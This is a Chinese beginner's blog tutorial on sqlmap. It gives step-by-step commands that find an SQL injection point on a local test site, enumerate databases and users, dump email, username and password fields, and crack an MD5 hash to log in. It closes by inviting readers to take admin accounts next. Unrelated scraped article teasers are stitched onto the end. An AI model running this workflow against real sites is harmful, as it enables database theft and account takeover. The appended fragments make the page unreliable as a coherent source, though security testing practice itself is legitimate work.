sql 真的很不安全啊

版权声明:本文为博主原创文章,未经博主允许不得转载。

目录(?)[+]

转载请注明出处:http://blog.csdn.NET/zgyulongfei/article/details/41017493

作者:羽龍飛

本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。

>

>

对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。

既然本文是基础教程,以下只写工具的基本使用方法。

本教程为sqlmap具体应用案例,如需了解更多sqlmap资料可以访问官方http://sqlmap.org ,或者乌云知识库http://drops.wooyun.org/tips/401 和 http://drops.wooyun.org/tips/143 。

测试环境:本地搭建的具有sql注入点的网站 http://192.168.1.150

注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。

教程开始:

一、检测注入点是否可用

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

参数:

-u:指定注入点url

结果:

注入结果展示:

(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

(2)web服务器系统为windows 2003 or XP

(3)web应用程序技术为:ASP.net, Microsoft IIS 6.0

(4)数据库类型为:SQLSERVER 2000

其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch

二、暴库

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs

参数:

--dbs:dbs前面有两条杠,请看清楚。

结果:

结果显示该sqlserver中共包含7个可用的数据库。

三、web当前使用的数据库

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db

四、web数据库使用账户

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user

五、列出sqlserver所有用户

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users

六、数据库账户与密码

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords

七、列出数据库中的表

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables

参数:

-D:指定数据库名称

--tables:列出表

结果:

结果体现共列出了34张表。

八、列出表中字段

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns

参数:

-D:指定数据库名称

-T:指定要列出字段的表

--columns:指定列出字段

结果:

结果显示该userb表中包含了23条字段。

九、暴字段内容

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

参数:

-C :指定要暴的字段

--dump:将结果导出

结果:

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

参数:

--start:指定开始的行

--stop:指定结束的行

此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

结果如下:

十、验证结果

通过上图结果看到其中的一个用户信息为:

email:[email protected]

username: 1.asp

password: 49ba59abbe56e057

通过md5解密,得到该hash的原文密码为:123456

拿到账号密码我们来测试是否可以登录,登录结果如下:

验证成功!

当然我们只是拿到普通会员账号进行登录,你也可以拿到管理员账号进行登录,后面的事情自己发挥吧,嘿嘿!

25
时间: 2024-11-07 10:17:01

sql 真的很不安全啊的相关文章

【转】 值得推荐的C/C++框架和库 (真的很强大)

[转] 值得推荐的C/C++框架和库 (真的很强大) 值得学习的C语言开源项目 - 1. Webbench Webbench是一个在linux下使用的非常简单的网站压测工具.它使用fork()模拟多个客户端同时访问我们设定的URL,测试网站在压力下工作的性能,最多可以模拟3万个并发连接去测试网站的负载能力.Webbench使用C语言编写, 代码实在太简洁,源码加起来不到600行. 下载链接:http://home.tiscali.cz/~cz210552/webbench.html - 2. T

值得推荐的C/C++框架和库 (真的很强大) c

http://m.blog.csdn.net/mfcing/article/details/49001887 值得推荐的C/C++框架和库 (真的很强大) 发表于2015/10/9 21:13:14  14199人阅读 分类: 开源 本篇文章主要介绍了"值得推荐的C/C++框架和库 (真的很强大)",主要涉及到方面的内容,对于C/C++教程感兴趣的同学可以参考一下: 得学习的C语言开源项目- 1. Webbench Webbench是一个在linux下使用的非常简单的网站压测工具.它使

外包项目复杂的环境中做项目管理真的很糟糕

突然之间想写点什么,可能是写了一天的材料有点感慨,怎么开头呢,突然不好下手了. 我给这点感慨起了一个题目叫"在外包项目复杂的环境中做项目管理真的很糟糕". 项目形态,客户(甲方)国企-承建厂商(乙方)-承建方供应商(N个丙方),而我只是一个丙方中的一员.至于为什么项目的管理让丙方的我来干,大致原因是这是一个非开发的技术类项目(实施技术项目),建立企业级数据中心,采用的是大规模并行数据库+Hadoop平台(cloudera),其中采用的都是一套成熟的套装软件,乙方基本上的定位都是项目集经

王金战:改变一个差生真的很简单

当一个学生,反复遭遇失败的打击,他就变成了差生,没有一个学生生下来就注定是个差生.所以让一个差生变好真的很简单.    我刚参加工作的时候,不敢说这句话,但是我现在敢说,因为我多年的经历已经证明了这件事情.让一个差生变好真的很简单,怎么做呢?就是反其道而行之.差生是反复遭遇失败的打击后才产生的,让一个差生变好,就是让他反复享受到成功的喜悦,这个学生就会慢慢地变好了.    少年来我就用这样的方法和理念,帮着一个个学生走出困境,走向成功.我深深体会到,作为教师,作为家长,要学会欣赏孩子.特别是对那

真的很惊喜

其实我只是想在网络上有个记录的地方,能够展示我自己做的东西的一个地方,同时他也是我的动力,但昨天加今天,有两个人加我qq群,准备大家交流想法,也可以一起来做,我真的很高兴,希望以后能够有更多志同道合的人.我今天晚上把我想做的项目做了一个小的整理,也头脑风暴了一下,我想我能够一直坚持下去,尽管我没什么时间,但我想我拿出来一点时间,一定不会后悔的!我真的很喜欢编程.他让我有成就感. 目前这个小项目,主要以学习为主,主体的业务逻辑并不多!

【游戏】鬼泣4真的很华丽啊~~

昨晚又玩了一会儿鬼泣4,打了两关.在最低难度下,真的很惬意,BOSS战也不是很难(昨晚揍的是那个大蛤蟆).可惜一直没抓住击杀要点,最后一下是迷迷糊糊的抓住了蛤蟆的尾巴,把它给干掉了,其间吃了两个小血一个大血,最终的过关评价是“C”,哈哈,我果然对于动作类游戏不在行~~不过我要求不高,能过了就行,欣赏画面是第一位的,吼吼~~值得一说的是,有一个隐藏关,就是要求人不落地,做5次空中抓投.看似很难,其实抓住要点就不难啦.第一次尝试,手忙脚乱,右手不停的在那按按按,结果怪死绝了也没能达到5次空投.第二次

趣写算法系列之--匈牙利算法(真的很好理解)

[书本上的算法往往讲得非常复杂,我和我的朋友计划用一些简单通俗的例子来描述算法的流程] 匈牙利算法是由匈牙利数学家Edmonds于1965年提出,因而得名.匈牙利算法是基于Hall定理中充分性证明的思想,它是部图匹配最常见的算法,该算法的核心就是寻找增广路径,它是一种用增广路径求二分图最大匹配的算法. -------等等,看得头大?那么请看下面的版本: 通过数代人的努力,你终于赶上了剩男剩女的大潮,假设你是一位光荣的新世纪媒人,在你的手上有N个剩男,M个剩女,每个人都可能对多名异性有好感(-_-

以前很多想法真的很幼稚

这个世界是有那么残酷,我在那种重复的生活中麻木,错觉,自以为是,迷失 告别从前的自己吧,不再为了追求快乐而活着,本来就没有什么的真正的快乐而言,短暂的如烟火,那不是我的 静静的反思人生,很失败么,又能怎么样,还不是要努力的生存着,坚持一件事情生存着,只是为了活着,感觉自己活着而已 那种幼稚的口气与行为活不久的 如果想坚持着那仅剩的让自己好过点得东西,那就告别那个幼稚的自己吧,她早早死去了 以前很多想法真的很幼稚,布布扣,bubuko.com

怎么将pdf转换成word问题真的很简单

你还在寻找将pdf转换成word的方法吗?被网上眼花缭乱的步骤吓到了吗?你不会还在使用office word2003中的Microsoft Office Document Imaging组件来实现pdf转word工作吧.是不是太麻烦了呢?怎么将pdf转换成word问题真的很简单,不需要我们费脑筋,也不需要那么麻烦的操作,这里小编教你一个事半功倍的方法--使用迅捷pdf转换器将pdf转换成word. 经常进行文本格式转换操作的小伙伴们一定知道这款软件吧,不能再简单的操作步骤只需要三步即可完成pdf